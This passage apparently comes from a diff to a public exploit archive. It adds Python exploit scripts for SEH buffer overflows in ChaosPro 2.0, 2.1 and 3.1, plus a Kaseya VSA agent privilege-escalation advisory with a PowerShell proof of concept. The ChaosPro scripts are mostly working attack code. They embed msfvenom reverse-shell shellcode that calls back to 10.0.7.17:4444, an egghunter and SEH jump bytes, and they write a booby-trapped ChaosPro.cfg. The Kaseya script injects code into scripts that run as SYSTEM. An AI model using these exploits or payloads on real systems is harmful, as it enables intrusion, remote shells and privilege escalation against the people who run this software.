"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
|
||||
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
|
||||
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
|
||||
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
|
||||
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
|
||||
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
|
||||
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
|
||||
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
|
||||
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
|
||||
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
|
||||
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
|
||||
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
|
||||
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
|
||||
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
|
||||
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
|
||||
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
|
||||
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
|
||||
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
|
||||
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
|
||||
)
|
||||
|
||||
#line containing our payload
|
||||
line_start = "Username "
|
||||
line_start += payload + "\n"
|
||||
|
||||
#line with our overflow
|
||||
line_start += "ProjectPath "
|
||||
junk = line_start
|
||||
|
||||
junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))
|
||||
|
||||
# our egghunter ...
|
||||
junk += egghunter
|
||||
|
||||
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
|
||||
junk += jmpforward06
|
||||
junk += jmpback80
|
||||
|
||||
#seh address for pop, pop and ret with a 0x00 at the end ...
|
||||
junk += "\x50\x49\x40"
|
||||
|
||||
# write the evil file
|
||||
with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
|
||||
the_file.write(junk)
|
103
exploits/windows/local/47333.py
Executable file
103
exploits/windows/local/47333.py
Executable file
|
@ -0,0 +1,103 @@
|
|||
#!C:\Python27\python.exe
|
||||
|
||||
# Title : ChaosPro 2.1
|
||||
# Twitter : @securitychops
|
||||
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
|
||||
|
||||
# our egg!
|
||||
payload = "T00WT00W"
|
||||
|
||||
#the payload
|
||||
payload += (
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
|
||||
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
|
||||
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
|
||||
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
|
||||
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
|
||||
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
|
||||
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
|
||||
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
|
||||
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
|
||||
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
|
||||
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
|
||||
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
|
||||
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
|
||||
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
|
||||
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
|
||||
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
|
||||
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
|
||||
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
|
||||
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
|
||||
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
|
||||
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
|
||||
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
|
||||
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
|
||||
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
|
||||
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
|
||||
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
|
||||
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
|
||||
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
|
||||
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
|
||||
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
|
||||
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
|
||||
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
|
||||
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
|
||||
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
|
||||
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
|
||||
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
|
||||
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
|
||||
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
|
||||
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
|
||||
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
|
||||
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
|
||||
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
|
||||
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
|
||||
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
|
||||
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
|
||||
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
|
||||
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
|
||||
)
|
||||
|
||||
#this needs to be a backwards jump to give us room to call stack jump code
|
||||
jmpbackD0 = "\x40\x75\xD0\x75"
|
||||
jmpforward06 = "\x40\x75\x06\x75"
|
||||
|
||||
# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
|
||||
opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
|
||||
|
||||
# our egghunter shellcode
|
||||
egghunter = (
|
||||
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
|
||||
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
|
||||
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
|
||||
"\xaf\x75\xe4\xff\xe7"
|
||||
)
|
||||
|
||||
#line containing our payload
|
||||
line_start = "Username "
|
||||
line_start += payload + "\n"
|
||||
|
||||
#line with our overflow
|
||||
line_start += "ProjectPath "
|
||||
junk = line_start
|
||||
|
||||
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
|
||||
|
||||
junk += "A" * (118 - len(egghunter))
|
||||
|
||||
# open calc
|
||||
junk += egghunter
|
||||
|
||||
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
|
||||
junk += jmpforward06
|
||||
junk += jmpbackD0
|
||||
|
||||
#seh address for pop, pop and ret with a 0x00 at the end ...
|
||||
junk += "\xab\x11\x40"
|
||||
|
||||
# write the evil file
|
||||
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
|
||||
the_file.write(junk)
|
305
exploits/windows/local/47334.py
Executable file
305
exploits/windows/local/47334.py
Executable file
|
@ -0,0 +1,305 @@
|
|||
#!C:\Python27\python.exe
|
||||
|
||||
# Title : ChaosPro 3.1
|
||||
# Twitter : @securitychops
|
||||
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
|
||||
|
||||
# our egg!
|
||||
payload = "T00WT00W"
|
||||
|
||||
# adjust the stack from 00F2FFA6 to 00F2FFA8
|
||||
payload += "\x83\xC4\x02"
|
||||
|
||||
#the payload
|
||||
payload += (
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
|
||||
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
|
||||
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
|
||||
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
|
||||
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
|
||||
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
|
||||
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
|
||||
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
|
||||
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
|
||||
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
|
||||
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
|
||||
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
|
||||
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
|
||||
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
|
||||
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
|
||||
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
|
||||
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
|
||||
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
|
||||
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
|
||||
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
|
||||
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
|
||||
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
|
||||
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
|
||||
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
|
||||
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
|
||||
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
|
||||
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
|
||||
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
|
||||
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
|
||||
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
|
||||
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
|
||||
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
|
||||
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
|
||||
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
|
||||
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
|
||||
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
|
||||
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
|
||||
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
|
||||
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
|
||||
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
|
||||
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
|
||||
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
|
||||
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
|
||||
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
|
||||
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
|
||||
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
|
||||
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
|
||||
)
|
||||
|
||||
#badchars
|
||||
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
|
||||
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
|
||||
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
|
||||
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
|
||||
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
|
||||
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
|
||||
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
|
||||
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
|
||||
|
||||
# stack alignment
|
||||
pop_esp = "\x5c"
|
||||
pop_eax = "\x58"
|
||||
push_eax = "\x50"
|
||||
push_esp = "\x54"
|
||||
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
|
||||
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"
|
||||
|
||||
#this needs to be a backwards jump to give us room to call stack jump code
|
||||
jmpback80 = "\x40\x75\x80\x75"
|
||||
jmpforward06 = "\x40\x75\x06\x75"
|
||||
|
||||
#line containing our payload
|
||||
line_start = "Username "
|
||||
line_start += payload + "\n"
|
||||
|
||||
#line with our overflow
|
||||
line_start += "ProjectPath "
|
||||
junk = line_start
|
||||
|
||||
#the buffer starts being overwritten with
|
||||
# our controlled values at 522
|
||||
junk += "A" * 522
|
||||
|
||||
#junk += alpha_numeric_hex
|
||||
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
|
||||
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)
|
||||
|
||||
# baby nopsled
|
||||
junk += "A" * 9
|
||||
|
||||
# ok, lets start working stuff here ... we have 126 bytesish ...
|
||||
junk += zero_eax
|
||||
junk += push_esp + pop_eax # push esp, pop eax
|
||||
junk += align_stack
|
||||
junk += push_eax
|
||||
junk += pop_esp
|
||||
|
||||
# first section into the stack
|
||||
# e7 ff e4 75
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x89\x88\x87\x86"
|
||||
junk += "\x2d\x01\x8f\x77\x8f"
|
||||
junk += "\x2d\x01\x04\x01\x02"
|
||||
junk += push_eax
|
||||
|
||||
# second section into the stack
|
||||
# af e7 75 af
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x4f\x4e\x4d\x4c"
|
||||
junk += "\x2d\x01\x39\x8f\x02"
|
||||
junk += "\x2d\x01\x03\x3c\x01"
|
||||
junk += push_eax
|
||||
|
||||
# third section into the stack
|
||||
# d7 89 57 30
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x8f\x8e\x74\x73"
|
||||
junk += "\x2d\x3e\x19\x01\x8f"
|
||||
junk += "\x2d\x03\x01\x01\x26"
|
||||
junk += push_eax
|
||||
|
||||
# size for section one
|
||||
junk += "A" * (
|
||||
126
|
||||
- 9 # nopsled
|
||||
|
||||
# aligning the stack
|
||||
- len(zero_eax)
|
||||
- len(push_esp)
|
||||
- len(pop_eax)
|
||||
- len(align_stack)
|
||||
- len(push_eax)
|
||||
- len(pop_esp)
|
||||
|
||||
# first set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# second set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# third set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
)
|
||||
|
||||
# baby nopslep just for breathing room
|
||||
junk += "AAAA"
|
||||
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
|
||||
junk += jmpforward06
|
||||
junk += jmpback80
|
||||
|
||||
#Section Two
|
||||
|
||||
# baby nopsled
|
||||
junk += "AAA"
|
||||
|
||||
# fourth section into the stack part two
|
||||
# 30 54 b8 ec
|
||||
# fourth section into the stack part one
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x80\x15\x75\x75"
|
||||
junk += "\x2d\x80\x20\x32\x35"
|
||||
junk += "\x2d\x14\x11\x04\x25"
|
||||
junk += push_eax
|
||||
|
||||
# fifth section into the stack
|
||||
# 74 5a 05 3c
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x8f\x8e\x8d\x89"
|
||||
junk += "\x2d\x34\x6b\x17\x01"
|
||||
junk += "\x2d\x01\x01\x01\x01"
|
||||
junk += push_eax
|
||||
|
||||
# sixth section into the stack
|
||||
# 2e cd 58 53
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x8f\x8e\x8d\x8c"
|
||||
junk += "\x2d\x1d\x18\x8e\x43"
|
||||
junk += "\x2d\x01\x01\x17\x01"
|
||||
junk += push_eax
|
||||
|
||||
# seventh section into the stack
|
||||
# 43 43 db 31
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x8f\x8e\x8d\x8c"
|
||||
junk += "\x2d\x3e\x7f\x2d\x2d"
|
||||
junk += "\x2d\x02\x17\x01\x03"
|
||||
junk += push_eax
|
||||
|
||||
junk += "A" * (
|
||||
126 # amount of room before we need to jump
|
||||
|
||||
- 3 # baby nopsled
|
||||
|
||||
# part one of fourth set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
|
||||
# part two of fourth sec of bytes going onto the stack
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# fifth set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# sixth set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# seventh set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
- 4 # baby nopsled
|
||||
- len(jmpback80)
|
||||
)
|
||||
|
||||
# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
|
||||
junk += jmpforward06
|
||||
junk += jmpback80
|
||||
|
||||
# baby nopsled
|
||||
junk += "AAAA"
|
||||
|
||||
# eighth section into the stack part two
|
||||
# 52 42 0f ff
|
||||
# good
|
||||
# eighth section into the stack part one
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x65\x65\x75\x75"
|
||||
junk += "\x2d\x65\x65\x25\x25"
|
||||
junk += "\x2d\x37\x25\x23\x13"
|
||||
junk += push_eax
|
||||
|
||||
# ninth section into the stack
|
||||
# ca 81 66 43
|
||||
# good
|
||||
junk += zero_eax
|
||||
junk += "\x2d\x8f\x81\x7c\x7b"
|
||||
junk += "\x2d\x2d\x17\x01\x8f"
|
||||
junk += "\x2d\x01\x01\x01\x2b"
|
||||
junk += push_eax
|
||||
|
||||
junk += "A" * (
|
||||
126 # amount of room before we need to jump
|
||||
|
||||
- len(jmpback80)
|
||||
|
||||
- 4 # baby nopsled
|
||||
|
||||
# eighth set of bytes going onto the stack
|
||||
# eighth section
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
# ninth set of bytes going onto the stack
|
||||
- len(zero_eax)
|
||||
- 15
|
||||
- len(push_eax)
|
||||
|
||||
- len(jmpforward06)
|
||||
)
|
||||
|
||||
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
|
||||
junk += jmpforward06
|
||||
junk += jmpback80
|
||||
|
||||
#seh address for pop, pop and ret with a 0x00 at the end ...
|
||||
junk += "\x5d\x10\x40"
|
||||
|
||||
# write the evil file
|
||||
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
|
||||
the_file.write(junk)
|
58
exploits/windows/local/47341.txt
Normal file
58
exploits/windows/local/47341.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
|
||||
# Google Dork: N/A
|
||||
# Date: 2-09-2019
|
||||
# Exploit Author: NF
|
||||
# Vendor Homepage: https://www.kaseya.com/products/vsa/
|
||||
# Software Link: https://www.kaseya.com/products/vsa/
|
||||
# Version: <= 9.5 agentmon.exe
|
||||
# Tested on: Windows 10
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
##Vulnerability##
|
||||
|
||||
This is not a new issue as such but more of the same in line with <a href="https://www.securityfocus.com/archive/1/541884/30/300/threaded">CVE-2017-12410</a> found by Filip Palian.
|
||||
A a fix was put in place for the original CVE, however it was specific to binaries and not scripts.
|
||||
The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by a elevated process.
|
||||
|
||||
The Kaseya agent (agentmon.exe) runs as SYSTEM by default.
|
||||
The agent also has a default working folder @ C:\kworking\
|
||||
It will pull scripts and binaries to this folder and execute them from disk from the controlling web application.
|
||||
By default the *Authenticated Users* group has all rights to this folder.
|
||||
|
||||
Scripts are written to disk however they are not checked for integrity prior to execution.
|
||||
So a folder can be monitored for script files being dropped and then append malicious code prior to execution.
|
||||
|
||||
##Proof of concept##
|
||||
|
||||
This PowerShell script will monitor the default working directory.
|
||||
When a ps1 script drops from a scheduled task or run from the VSA web application it will then append the command "Write-Host 'injected content'" which will run as SYSTEM.
|
||||
Change the Write-Host command to the code to be executed or update the script to target other script drops such as vb script.
|
||||
|
||||
Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts
|
||||
|
||||
<--script start-->
|
||||
|
||||
$folder = 'c:\kworking'
|
||||
$filter = '*.ps1'
|
||||
|
||||
$filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false;NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'}
|
||||
|
||||
Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action {
|
||||
$path = $Event.SourceEventArgs.FullPath
|
||||
"`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8
|
||||
Unregister-Event FileCreated
|
||||
}
|
||||
|
||||
<--script end-->
|
||||
|
||||
##Timeline##
|
||||
|
||||
16-06-2019 :: Issue found
|
||||
18-06-2019 :: security@ emailed requesting steps to disclose
|
||||
30-06-2019 :: CERT contacted due to non response of vendor from official email address
|
||||
31-06-2019 :: CERT still unable to contact vendor
|
||||
07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
|
||||
20-08-2019 :: Vendor confirms receipt of details
|
||||
27-08-2019 :: Email sent indicating intention to disclose due to lack of response
|
||||
02-09-2019 :: No response through CERT. Findings published
|
|
@ -10670,6 +10670,10 @@ id,file,description,date,author,type,platform,port
|
|||
47306,exploits/windows/local/47306.txt,"Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass",2019-08-26,"Google Security Research",local,windows,
|
||||
47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
|
||||
47321,exploits/android/local/47321.txt,"Canon PRINT 2.5.5 - Information Disclosure",2019-08-30,0x48piraj,local,android,
|
||||
47332,exploits/windows/local/47332.py,"ChaosPro 2.0 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
|
||||
47333,exploits/windows/local/47333.py,"ChaosPro 2.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
|
||||
47334,exploits/windows/local/47334.py,"ChaosPro 3.1 - SEH Buffer Overflow",2019-09-02,"Jonathan Crosby",local,windows,
|
||||
47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17648,6 +17652,8 @@ id,file,description,date,author,type,platform,port
|
|||
47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple,
|
||||
